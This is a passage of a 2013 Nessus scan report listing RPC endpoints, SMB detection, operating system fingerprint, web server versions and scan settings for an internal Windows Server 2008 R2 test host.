+UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.23 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49154 +IP : 10.31.112.23 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available on TCP port 49252 : + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 367abb81-9844-35f1-ad32-98f038001003, version 2.0 +Description : Unknown RPC service +Type : Remote RPC service +TCP Port : 49252 +IP : 10.31.112.23 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available remotely : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP03 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\InitShutdown +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \pipe\lsass +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Remote RPC service +Named pipe : \PIPE\protected_storage +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Remote RPC service +Named pipe : \PIPE\W32TIME_ALT +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP03 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP03 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\atsvc +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Remote RPC service +Named pipe : \PIPE\srvsvc +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP03 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Remote RPC service +Named pipe : \pipe\eventlog +Netbios name : \\QA3APP03 + + + + +By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. +Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. +dcetest.nasl +2012/01/31 +DCE Services Enumeration +2001/08/26 +local +None +$Revision: 1.50 $ +n/a +A DCE/RPC service is running on the remote host. + +The following DCERPC services are available locally : + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : 765294ba-60bc-48b8-92e9-89fd77769d91 +UUID : d95afe70-a6d5-4259-822e-2c84da1ddb0d, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E140 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WindowsShutdown + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000000 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc07E140 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 3bdb59a0-d736-4d44-9074-c1ee00000001 +UUID : 24019106-a203-4642-b88d-82dae9158929, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : LRPC-f5843715c61bfe6885 + +Object UUID : b08669ee-8cb5-43a5-a017-84fe00000001 +UUID : 76f226c3-ec14-4325-8a99-6a46348418af, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : WMsgKRpc03A09F1 + +Object UUID : 6d726574-7273-0076-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : LRPC-9cf1e6df3ddaf18254 + +Object UUID : fe206cf5-5acb-4c5a-a53e-6a625d74a3a5 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-515d4e943a973fcbf5 + +Object UUID : fdc94e04-ca57-4224-8b4a-dcea460b37d8 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-515d4e943a973fcbf5 + +Object UUID : b1f7e4b6-4c1d-4653-8af6-75d7dc766eb7 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-515d4e943a973fcbf5 + +Object UUID : ea2539b6-cda6-4025-a420-0c083ea8f530 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-515d4e943a973fcbf5 + +Object UUID : cc76c593-c771-405f-95f2-831ac11d10b0 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : OLE04094ECF1AFA4F71BE44598CE050 + +Object UUID : cc76c593-c771-405f-95f2-831ac11d10b0 +UUID : 906b0ce0-c70b-1067-b317-00dd010662da, version 1.0 +Description : Distributed Transaction Coordinator +Windows process : msdtc.exe +Type : Local RPC service +Named pipe : LRPC-5bae080da7fcf1b0cf + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 +Description : IPsec Services (Windows XP & 2003) +Windows process : lsass.exe +Annotation : IPSec Policy agent endpoint +Type : Local RPC service +Named pipe : LRPC-594a677f38810976f7 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LRPC-61fb4d37067ba3aeb7 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : audit + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : securityevent + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : LSARPC_ENDPOINT + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsapolicylookup + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : lsasspirpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : protected_storage + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : dsrole + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 12345778-1234-abcd-ef00-0123456789ac, version 1.0 +Description : Security Account Manager +Windows process : lsass.exe +Type : Local RPC service +Named pipe : samss lpc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : ae33069b-a2a8-46ee-a235-ddfd339be281, version 1.0 +Description : Unknown RPC service +Annotation : Spooler base remote object endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 4a452661-8290-4b36-8fbe-7f4093a94978, version 1.0 +Description : Unknown RPC service +Annotation : Spooler function endpoint +Type : Local RPC service +Named pipe : spoolss + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : dd490425-5325-4565-b774-7e27d6c09c24, version 1.0 +Description : Unknown RPC service +Annotation : Base Firewall Engine API +Type : Local RPC service +Named pipe : LRPC-f3d7a5a2e640916b7e + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-f3d7a5a2e640916b7e + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 2fb92682-6599-42dc-ae13-bd2ca89bd11c, version 1.0 +Description : Unknown RPC service +Annotation : Fw APIs +Type : Local RPC service +Named pipe : LRPC-f3d7a5a2e640916b7e + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : OLE03CEBF0FFEF44A66AF8A0D4450E5 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 +Description : Unknown RPC service +Annotation : NSI server endpoint +Type : Local RPC service +Named pipe : LRPC-20e134a2fe92fb8f3d + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : OLE03CEBF0FFEF44A66AF8A0D4450E5 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : LRPC-20e134a2fe92fb8f3d + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 +Description : Unknown RPC service +Annotation : WinHttp Auto-Proxy Service +Type : Local RPC service +Named pipe : W32TIME_ALT + +Object UUID : 666f7270-6c69-7365-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 6c637067-6569-746e-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601 +UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLE00F960A1A06D423DA757C39857DA + +Object UUID : 736e6573-0000-0000-0000-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE00F960A1A06D423DA757C39857DA + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE00F960A1A06D423DA757C39857DA + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : OLE00F960A1A06D423DA757C39857DA + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 +Description : Scheduler Service +Windows process : svchost.exe +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLE00F960A1A06D423DA757C39857DA + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : OLE00F960A1A06D423DA757C39857DA + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 +Description : Unknown RPC service +Annotation : IKE/Authip API +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : OLE00F960A1A06D423DA757C39857DA + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 +Description : Unknown RPC service +Annotation : IP Transition Configuration endpoint +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : OLE00F960A1A06D423DA757C39857DA + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 +Description : Unknown RPC service +Annotation : XactSrv service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : OLE00F960A1A06D423DA757C39857DA + +Object UUID : 73736573-6f69-656e-6e76-000000000000 +UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 +Description : Unknown RPC service +Annotation : Impl friendly name +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : IUserProfile2 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : OLE00F960A1A06D423DA757C39857DA + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30b044a5-a225-43f0-b3a4-e060df91f9c1, version 1.0 +Description : Unknown RPC service +Type : Local RPC service +Named pipe : senssvc + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 +Description : Unknown RPC service +Annotation : Event log TCPIP +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 +Description : Unknown RPC service +Annotation : NRP server endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 +Description : Unknown RPC service +Annotation : DHCPv6 Client LRPC Endpoint +Type : Local RPC service +Named pipe : dhcpcsvc6 + +Object UUID : 00000000-0000-0000-0000-000000000000 +UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 +Description : DHCP Client Service +Windows process : svchost.exe +Annotation : DHCP Client LRPC Endpoint +Type : Local RPC service +Named pipe : eventlog + + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +An SMB server is running on this port. + + + +The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. +cifs445.nasl +2012/01/31 +Microsoft Windows SMB Service Detection +2002/06/05 +remote +None +$Revision: 1.37 $ +n/a +A file / print sharing service is listening on the remote host. + +A CIFS server is running on this port. + + + + +Mon Jul 1 11:54:48 2013 +1 +general-purpose +Microsoft Windows Server 2008 R2 Standard Service Pack 1 +00:50:56:81:01:db +10.31.112.22 +172.16.138.2 +10.31.112.22 +qa3app02 +QA3APP02 +Mon Jul 1 11:33:11 2013 + + +This script displays, for each tested host, information about the scan itself : + + - The version of the plugin set + - The type of plugin feed (HomeFeed or ProfessionalFeed) + - The version of the Nessus Engine + - The port scanner(s) used + - The port range scanned + - Whether credentialed or third-party patch management checks are possible + - The date of the scan + - The duration of the scan + - The number of hosts scanned in parallel + - The number of checks done in parallel +scan_info.nasl +2013/05/31 +Nessus Scan Information +2005/08/26 +summary +None +$Revision: 1.59 $ +n/a +Information about the Nessus scan. +Information about this scan : + +Nessus version : 5.2.1 +Plugin feed version : 201306260615 +Type of plugin feed : HomeFeed (Non-commercial use only) +Scanner IP : 172.16.138.174 +Port scanner(s) : nessus_syn_scanner +Port range : default +Thorough tests : no +Experimental tests : no +Paranoia level : 1 +Report Verbosity : 1 +Safe checks : yes +Optimize the test : yes +Credentialed checks : no +Patch management checks : None +CGI scanning : disabled +Web application tests : disabled +Max hosts : 80 +Max checks : 5 +Recv timeout : 5 +Backports : None +Allow post-scan editing: Yes +Scan Start Date : 2013/7/1 11:33 +Scan duration : 1293 sec + + + +One of several ports that were previously open are now closed or unresponsive. + +There are several possible reasons for this : + + - The scan may have caused a service to freeze or stop running. + + - An administrator may have stopped a particular service during the scanning process. + +This might be an availability problem related to the following : + + - A network outage has been experienced during the scan, and the remote network cannot be reached anymore by the scanner. + + - This scanner may has been blacklisted by the system administrator or by an automatic intrusion detection / prevention system that detected the scan. + + - The remote host is now down, either because a user turned it off during the scan or because a select denial of service was effective. + +In any case, the audit of the remote host might be incomplete and may need to be done again +check_ports.nasl +2013/05/14 +Open Port Re-check +2002/03/19 +remote +None +$Revision: 1.41 $ +- Increase checks_read_timeout and/or reduce max_checks + +- Disable any IPS during the Nessus scan +Previously open ports are now closed. +Port 135 was detected as being open but is now unresponsive +Port 10002 was detected as being open but is now unresponsive +Port 3389 was detected as being open but is now unresponsive +Port 7001 was detected as being open but is now unresponsive +Port 80 was detected as being open but is now unresponsive + + + +By using information obtained from a Nessus scan, this plugin reports CPE (Common Platform Enumeration) matches for various hardware and software products found on a host. + +Note that if an official CPE is not available for the product, this plugin computes the best possible CPE based on the information available from the scan. +cpe.nbin +2013/05/13 +Common Platform Enumeration (CPE) +2010/04/21 +local +None +$Revision: 1.19 $ +http://cpe.mitre.org/ +n/a +It is possible to enumerate CPE names that matched on the remote system. + +The remote operating system matched the following CPE : + + cpe:/o:microsoft:windows_server_2008:r2:sp1 -> Microsoft Windows Server 2008 R2 Service Pack 1 + +Following application CPE matched on the remote system : + + cpe:/a:microsoft:iis:7.5 -> Microsoft Internet Information Services (IIS) 7.5 + + + +Based on the remote operating system, it is possible to determine what the remote system type is (eg: a printer, router, general-purpose computer, etc). +device_type.nasl +2011/05/23 +Device Type +2011/05/23 +combined +None +$Revision: 1.1 $ +n/a +It is possible to guess the remote device type. +Remote device type : general-purpose +Confidence level : 99 + + + +Using a combination of remote probes (TCP/IP, SMB, HTTP, NTP, SNMP, etc...), it is possible to guess the name of the remote operating system in use. It is also sometimes possible to guess the version of the operating system. +os_fingerprint.nasl +2013/04/01 +OS Identification +2003/12/09 +combined +None +$Revision: 2.34 $ +n/a +It is possible to guess the remote operating system. + +Remote operating system : Microsoft Windows Server 2008 R2 Standard Service Pack 1 +Confidence Level : 99 +Method : MSRPC + + +The remote host is running Microsoft Windows Server 2008 R2 Standard Service Pack 1 + + +This plugin attempts to determine the type and the version of the remote web server. +http_version.nasl +2013/06/03 +HTTP Server Type and Version +2000/01/04 +remote +None +$Revision: 1.111 $ +n/a +A web server is running on the remote host. +The remote web server type is : + +Microsoft-HTTPAPI/2.0 + + +This plugin attempts to determine the type and the version of the remote web server. +http_version.nasl +2013/06/03 +HTTP Server Type and Version +2000/01/04 +remote +None +$Revision: 1.111 $ +n/a +A web server is running on the remote host. +The remote web server type is : + +Microsoft-IIS/7.5 + + +By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory. + +As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes' in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501. + +Note that the plugin output is only informational and does not necessarily indicate the presence of any security vulnerabilities. +web_directory_options.nasl +2013/05/09 +HTTP Methods Allowed (per directory) +2009/12/10 +remote +None +$Revision: 1.7 $ +n/a +This plugin determines which HTTP methods are allowed on various 